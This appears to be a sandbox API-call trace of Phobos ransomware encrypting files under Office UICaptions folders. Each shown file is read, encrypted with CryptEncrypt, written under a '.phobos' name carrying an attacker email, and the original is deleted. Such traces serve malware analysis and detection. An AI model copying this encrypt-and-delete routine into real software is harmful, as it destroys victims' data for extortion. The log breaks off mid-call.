[0167.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0167.344] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0167.344] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0167.344] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x25360, lpOverlapped=0x0) returned 1 [0167.469] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x25370, dwBufLen=0x25370 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x25370) returned 1 [0167.470] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x25370, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x25370, lpOverlapped=0x0) returned 1 [0167.473] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0167.473] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0167.473] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0167.473] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0167.473] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0167.473] CryptDestroyKey (hKey=0xa327e8) returned 1 [0167.473] CloseHandle (hObject=0x14c) returned 1 [0167.473] CloseHandle (hObject=0x194) returned 1 [0167.473] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll")) returned 1 [0167.475] SetEvent (hEvent=0xe8) returned 1 [0167.475] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0167.475] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0167.475] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1276256) returned 1 [0167.475] CloseHandle (hObject=0x194) returned 1 [0167.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll")) returned 0x2020 [0167.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.476] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0167.477] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0167.477] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0167.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0167.477] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0167.477] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0167.477] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0168.020] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0168.037] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0168.081] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x27860, lpOverlapped=0x0) returned 1 [0168.101] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x27870, dwBufLen=0x27870 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x27870) returned 1 [0168.102] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x27870, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x27870, lpOverlapped=0x0) returned 1 [0168.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0168.104] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.104] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0168.104] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.104] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0168.104] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.104] CloseHandle (hObject=0x194) returned 1 [0168.104] CloseHandle (hObject=0x14c) returned 1 [0168.104] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll")) returned 1 [0168.107] SetEvent (hEvent=0xe8) returned 1 [0168.107] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0168.107] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.107] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=235872) returned 1 [0168.107] CloseHandle (hObject=0x14c) returned 1 [0168.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll")) returned 0x2020 [0168.107] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.107] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.108] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.108] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.108] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0168.108] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.108] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x39960, lpOverlapped=0x0) returned 1 [0168.169] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x39970, dwBufLen=0x39970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x39970) returned 1 [0168.171] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x39970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x39970, lpOverlapped=0x0) returned 1 [0168.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0168.174] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.174] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0168.174] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.174] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0168.174] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.174] CloseHandle (hObject=0x14c) returned 1 [0168.174] CloseHandle (hObject=0x194) returned 1 [0168.174] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll")) returned 1 [0168.182] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0168.182] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.183] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=49504) returned 1 [0168.183] CloseHandle (hObject=0x194) returned 1 [0168.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll")) returned 0x2020 [0168.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.183] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.183] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.183] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.183] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.183] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0168.183] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.183] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xc160, lpOverlapped=0x0) returned 1 [0168.373] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xc170, dwBufLen=0xc170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xc170) returned 1 [0168.374] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xc170, lpOverlapped=0x0) returned 1 [0168.375] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0168.376] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.376] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0168.376] CryptDestroyKey (hKey=0xa32d28) returned 1 [0168.376] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0168.376] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.376] CloseHandle (hObject=0x194) returned 1 [0168.376] CloseHandle (hObject=0x14c) returned 1 [0168.376] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll")) returned 1 [0168.378] SetEvent (hEvent=0xe8) returned 1 [0168.378] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0168.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.378] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=94048) returned 1 [0168.378] CloseHandle (hObject=0x14c) returned 1 [0168.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll")) returned 0x2020 [0168.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.379] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.379] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.379] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.379] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0168.379] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.379] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x16f60, lpOverlapped=0x0) returned 1 [0168.459] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x16f70, dwBufLen=0x16f70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x16f70) returned 1 [0168.460] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x16f70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x16f70, lpOverlapped=0x0) returned 1 [0168.462] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0168.462] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.462] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0168.462] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.462] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0168.462] CryptDestroyKey (hKey=0xa327e8) returned 1 [0168.462] CloseHandle (hObject=0x14c) returned 1 [0168.462] CloseHandle (hObject=0x194) returned 1 [0168.462] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll")) returned 1 [0168.464] SetEvent (hEvent=0xe8) returned 1 [0168.464] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0168.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.464] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=45920) returned 1 [0168.464] CloseHandle (hObject=0x194) returned 1 [0168.464] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll")) returned 0x2020 [0168.464] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0168.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0168.464] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.464] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0168.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0168.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0168.465] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0168.465] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, 